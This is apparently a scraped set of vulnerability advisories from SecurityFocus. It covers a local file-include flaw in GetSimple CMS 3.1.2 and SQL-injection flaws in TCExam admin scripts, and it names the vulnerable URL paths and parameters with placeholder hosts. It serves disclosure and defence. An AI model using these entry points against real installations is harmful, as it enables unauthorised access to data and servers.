Affected Area(s):                  [+] Admin & CMS


===========================================================

[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.


(hyp3rlinx)
HireHackking 
source: https://www.securityfocus.com/bid/54866/info

GetSimple is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to obtain potentially sensitive information or to execute arbitrary local scripts in the context of the web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible.

GetSimple 3.1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/cms/admin/filebrowser.php?path=[LFI]
HireHackking 
source: https://www.securityfocus.com/bid/54861/info

TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Versions prior to TCExam 11.3.008 are vulnerable. 

http://www.example.com/admin/code/tce_edit_answer.php?subject_module_id
http://www.example.com/admin/code/tce_edit_answer.php?question_subject_id
HireHackking 
source: https://www.securityfocus.com/bid/54861/info
 
TCExam is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
 
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 
Versions prior to TCExam 11.3.008 are vulnerable. 

http://www.example.com/admin/code/tce_edit_question.php?subject_module_id